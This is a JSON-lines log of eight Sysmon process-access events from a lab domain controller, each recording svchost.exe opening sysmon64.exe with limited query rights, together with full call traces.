{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
